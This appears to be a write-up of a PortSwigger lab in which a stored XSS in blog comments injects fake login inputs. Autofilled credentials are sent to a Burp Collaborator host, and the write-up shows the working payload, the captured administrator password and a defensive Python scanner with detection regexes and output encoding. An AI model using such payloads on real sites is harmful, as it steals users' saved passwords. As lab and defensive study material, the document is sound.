Capturing Passwords via XSS
Lab
Exploiting cross-site scripting to capture passwords · Practitioner
Reconnaissance
Go straight to the comment field and check for XSS with the probe string COMMENT<>'"\ — it is reflected unencoded, so XSS is confirmed.
Next, a simple payload — <img src=x onerror=fetch(1)> — fires, confirming that injected HTML executes script.
Exploitation
Approach
PortSwigger suggests injecting fake login inputs that the browser fills in via credential autofill — provided the user has saved their password for the site. For the autofill mechanism to fire, the inputs need these attributes:
<input name=username id=username>
<input type=password name=password>
Exfiltration
Now we need to send the captured data out. We'll use Burp Collaborator. The onchange event is the trigger: it fires once the browser has filled in a value, so that is when username and password are sent.
Final payload:
<input name=username id=username onchange=fetch("https://6pwq1k8rxl5e6swnw369cafh58bzzpne.oastify.com?user="+this.value)>
<input type=password name=password onchange=fetch("https://6pwq1k8rxl5e6swnw369cafh58bzzpne.oastify.com?pwd="+this.value)>
Heads-up: only one payload should be present in the comments (test the final one on a fresh post with no comments, otherwise form autofill breaks).
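The defender's view of the same payload, as an added example that is not part of the original writeup or of the PortSwigger lab: a small Python check that flags stored comments containing autofill-targetable inputs or inline event handlers, beside the output encoding that would have stopped the injected markup from being rendered as HTML in the first place. The sample comments and the attacker.example hostname are constructed for the example.

```python
import html
import re

# Constructed sample comments: benign text next to the autofill-harvesting
# payload shape described above (placeholder hostname, not a real Collaborator URL).
SAMPLE_COMMENTS = [
    'Great post, thanks!',
    '<input name=username id=username onchange=fetch("https://attacker.example?user="+this.value)>',
    '<input type=password name=password onchange=fetch("https://attacker.example?pwd="+this.value)>',
    '<img src=x onerror=fetch(1)>',
    'Use <b>bold</b> sparingly',
]

# An <input> whose name/id/autocomplete points at a credential field, or whose
# type is password: exactly the shape the browser's credential autofill populates.
AUTOFILL_INPUT = re.compile(
    r'<input\b[^>]*\b(?:name|id|autocomplete)\s*=\s*["\']?(?:username|password|current-password)\b'
    r'|<input\b[^>]*\btype\s*=\s*["\']?password\b',
    re.IGNORECASE,
)

# Any tag carrying an inline event handler attribute (onchange, onerror, ...).
EVENT_HANDLER = re.compile(r'<[a-z][^>]*\bon[a-z]+\s*=', re.IGNORECASE)


def classify(comment):
    """Return the findings for one stored comment; an empty list means nothing suspicious."""
    findings = []
    if AUTOFILL_INPUT.search(comment):
        findings.append('autofill-input')
    if EVENT_HANDLER.search(comment):
        findings.append('event-handler')
    return findings


def scan(comments):
    """Map comment index -> findings for every comment that triggered a rule."""
    results = {}
    for index, comment in enumerate(comments):
        findings = classify(comment)
        if findings:
            results[index] = findings
    return results


def render_comment(comment):
    """Encode a comment for HTML output so injected markup is displayed, never parsed."""
    return html.escape(comment, quote=True)


if __name__ == '__main__':
    for index, findings in scan(SAMPLE_COMMENTS).items():
        print(f'comment {index}: {", ".join(findings)}')
    print(render_comment(SAMPLE_COMMENTS[1]))
```

The scanner is a triage aid for comments already in the database; the real fix is render_comment, which turns every `<` into `&lt;` so neither the fake inputs nor the event handler ever reach the HTML parser.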
Result
Burp Collaborator received 3 requests:
GET /?user=administratoradministrator HTTP/1.1
GET /?pwd=mba29ry6e4jzms6kv354 HTTP/1.1
GET /?user=administrator HTTP/1.1
The first request is odd: the username value appears twice.
Try administrator / mba29ry6e4jzms6kv354 — it works.